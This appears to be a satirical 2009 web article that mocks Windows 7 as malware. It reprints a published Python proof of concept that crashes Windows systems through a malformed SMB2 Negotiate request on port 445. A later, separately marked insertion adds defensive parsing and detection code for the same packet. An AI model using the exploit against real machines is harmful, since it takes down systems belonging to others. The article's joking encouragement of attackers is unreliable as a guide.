
Windows Users Open Your Systems

A wonderful treat awaits those foolish enough to buy Windows again on Catch-22 day.



October 2009: on the 22nd of this month the next great malware outbreak will occur on this planet and security researchers everywhere are already preparing for the coming devastation. The malware strain, dubbed 'Win32.Se7en.xBlah-A' by researchers, takes the form of a primitive operating system but in fact functions as a host for various viruses and worms subsequently injected by haXors from Russia to Rio de Janeiro.

And purchasers of this 'operating system' stand to be the great victims.


Read on to learn how to protect yourself so you too can be safe.

Characteristics

The Win32.Se7en.xBlah-A trojan appears for all practical purposes to be an ordinary albeit rather lacklustre operating system but there are giveaways such as drive letters and a third-rate graphical interface. But to the untrained eye of a Windows user things can seem rather normal.

The potential buyer should be on the lookout for mention of 'Microsoft', 'Windows', 'Se7en', and tag lines such as 'the best program ever written'. These are indications the product is secretly destructive. The product should be avoided at all costs.

Of further concern is the recent revelation there's a heretofore unknown exploit waiting when lusers open their shrink wraps - a fatal security hole in a 'server message block' module that was not known at the time the malware went into production.

SMB2.0 NEGOTIATE PROTOCOL REQUEST Remote BSOD

Laurent Gaffié released details of a medium/high severity attack today. It attacks both the abortive Se7en as well as its predecessor. [Punters still running XP or earlier are not affected.]

Gaffié also released proof of concept code (in Python no less) so haXors everywhere can get ready in time.

#!/usr/bin/python

from socket import socket
from time import sleep

host = "IP_ADDR", 445
buff = (
"\x00\x00\x00\x90" # Begin SMB header: Session message
"\xff\x53\x4d\x42" # Server Component: SMB
"\x72\x00\x00\x00" # Negotiate Protocol
"\x00\x18\x53\xc8" # Operation 0x18 & sub 0xc853
"\x00\x26"# Process ID High: --> :) normal value should be "\x00\x00"
"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\xff\xff\xff\xfe"
"\x00\x00\x00\x00\x00\x6d\x00\x02\x50\x43\x20\x4e\x45\x54"
"\x57\x4f\x52\x4b\x20\x50\x52\x4f\x47\x52\x41\x4d\x20\x31"
"\x2e\x30\x00\x02\x4c\x41\x4e\x4d\x41\x4e\x31\x2e\x30\x00"
"\x02\x57\x69\x6e\x64\x6f\x77\x73\x20\x66\x6f\x72\x20\x57"
"\x6f\x72\x6b\x67\x72\x6f\x75\x70\x73\x20\x33\x2e\x31\x61"
"\x00\x02\x4c\x4d\x31\x2e\x32\x58\x30\x30\x32\x00\x02\x4c"
"\x41\x4e\x4d\x41\x4e\x32\x2e\x31\x00\x02\x4e\x54\x20\x4c"
"\x4d\x20\x30\x2e\x31\x32\x00\x02\x53\x4d\x42\x20\x32\x2e"
"\x30\x30\x32\x00"
)
s = socket()
s.connect(host)
s.send(buff)
s.close()

Any Se7en box with SMB enabled will 'crash'. Suspicion is Windows Server 2008 will also go down. And lest we forget: a crash today is a hack tomorrow. But that's for the black hats around the world to work on. They have a month and a half to get ready and that should be more than enough time.
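What the defender side of this looks like, as an added example that is not part of the original article or of Gaffié's proof of concept: the trigger the text calls out is a Negotiate Protocol request whose Process ID High field in the SMB header is not zero (the page's bytes "\x00\x26" read as 0x2600 little-endian, where a normal client sends 0x0000). The parser below walks the NetBIOS session header and the 32-byte SMB1 header, pulls the dialect list out of the Negotiate body, and reports a non-zero PIDHigh, with a second finding when an SMB2 dialect is offered in the same request. It sends nothing; the fixture builder only constructs in-memory test input, and the field names, the sample dialect strings and the function names are this example's own assumptions about a reasonable detection layout.

```python
import struct

# Framing facts for SMB1 on TCP/445: a 4-byte NetBIOS session header
# (type byte + 3-byte big-endian length) precedes a 32-byte SMB header.
NBSS_LEN = 4
SMB_HEADER_LEN = 32
SMB_MAGIC = b"\xffSMB"
SMB_COM_NEGOTIATE = 0x72


def parse_smb_message(msg):
    """Parse one SMB1 message into a dict of header fields. For a Negotiate
    request the dict also carries the dialect strings the client offers.
    Returns None when the bytes do not look like an SMB1 message."""
    if len(msg) < NBSS_LEN + SMB_HEADER_LEN:
        return None
    nbss_len = int.from_bytes(msg[1:4], "big")
    hdr = msg[NBSS_LEN:NBSS_LEN + SMB_HEADER_LEN]
    if hdr[:4] != SMB_MAGIC:
        return None
    # Field order after the magic: Command, Status, Flags, Flags2, PIDHigh,
    # SecuritySignature(8), Reserved, TID, PIDLow, UID, MID (all little-endian).
    (command, status, flags, flags2, pid_high, signature, reserved,
     tid, pid_low, uid, mid) = struct.unpack("<BIBHH8sHHHHH", hdr[4:])
    parsed = {
        "nbss_len": nbss_len,
        "command": command,
        "flags2": flags2,
        "pid_high": pid_high,
        "tid": tid,
        "pid_low": pid_low,
        "uid": uid,
        "mid": mid,
        "dialects": [],
    }
    body = msg[NBSS_LEN + SMB_HEADER_LEN:]
    if command == SMB_COM_NEGOTIATE and len(body) >= 3:
        # Negotiate body: WordCount (1), ByteCount (2, LE), then dialect
        # entries of the form 0x02 + NUL-terminated ASCII string.
        byte_count = struct.unpack("<H", body[1:3])[0]
        data = body[3:3 + byte_count]
        for entry in data.split(b"\x00"):
            if entry.startswith(b"\x02"):
                parsed["dialects"].append(entry[1:].decode("ascii", "replace"))
    return parsed


def negotiate_findings(msg):
    """Return a list of findings for one message; an empty list means nothing
    anomalous was seen. The checks mirror what the article calls out: a
    Negotiate request with a non-zero PIDHigh, and one that additionally
    offers an SMB2 dialect (the SMB2 path is where the crash is reported)."""
    p = parse_smb_message(msg)
    if p is None or p["command"] != SMB_COM_NEGOTIATE:
        return []
    findings = []
    if p["pid_high"] != 0:
        findings.append("Negotiate request with non-zero PIDHigh 0x%04x"
                        % p["pid_high"])
        if any(d.startswith("SMB 2") for d in p["dialects"]):
            findings.append("SMB2 dialect offered alongside malformed header: "
                            + ", ".join(p["dialects"]))
    return findings


def build_negotiate_fixture(pid_high, dialects):
    """Constructed test input, not captured traffic: a minimal SMB1 Negotiate
    request with the given PIDHigh and dialect list. Deliberately no network
    code; this only feeds the parser above."""
    data = b"".join(b"\x02" + d.encode("ascii") + b"\x00" for d in dialects)
    header = SMB_MAGIC + struct.pack(
        "<BIBHH8sHHHHH", SMB_COM_NEGOTIATE, 0, 0x18, 0xc853, pid_high,
        b"\x00" * 8, 0, 0xffff, 0xfeff, 0, 0)
    body = struct.pack("<BH", 0, len(data)) + data
    smb = header + body
    return b"\x00" + len(smb).to_bytes(3, "big") + smb


if __name__ == "__main__":
    dialects = ["PC NETWORK PROGRAM 1.0", "NT LM 0.12", "SMB 2.002"]
    for label, pid_high in (("normal client", 0x0000), ("malformed header", 0x2600)):
        print(label, "->", negotiate_findings(build_negotiate_fixture(pid_high, dialects)) or "no findings")
```

Pointed at a packet capture or an IDS tap, the same two checks are what a signature for this bug boils down to: match the Negotiate command byte, read two bytes at offset 12 of the SMB header, and alert when they are not zero. Until the server is patched, the practical mitigations are the usual ones for a port 445 bug: keep TCP 445 filtered at the perimeter and on host firewalls, and log any Negotiate request that trips the PIDHigh check so the source can be traced.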

See Also
Laurent Gaffié: SMB2.0 NEGOTIATE PROTOCOL REQUEST Remote BSOD

Copyright © Rixstep. All rights reserved.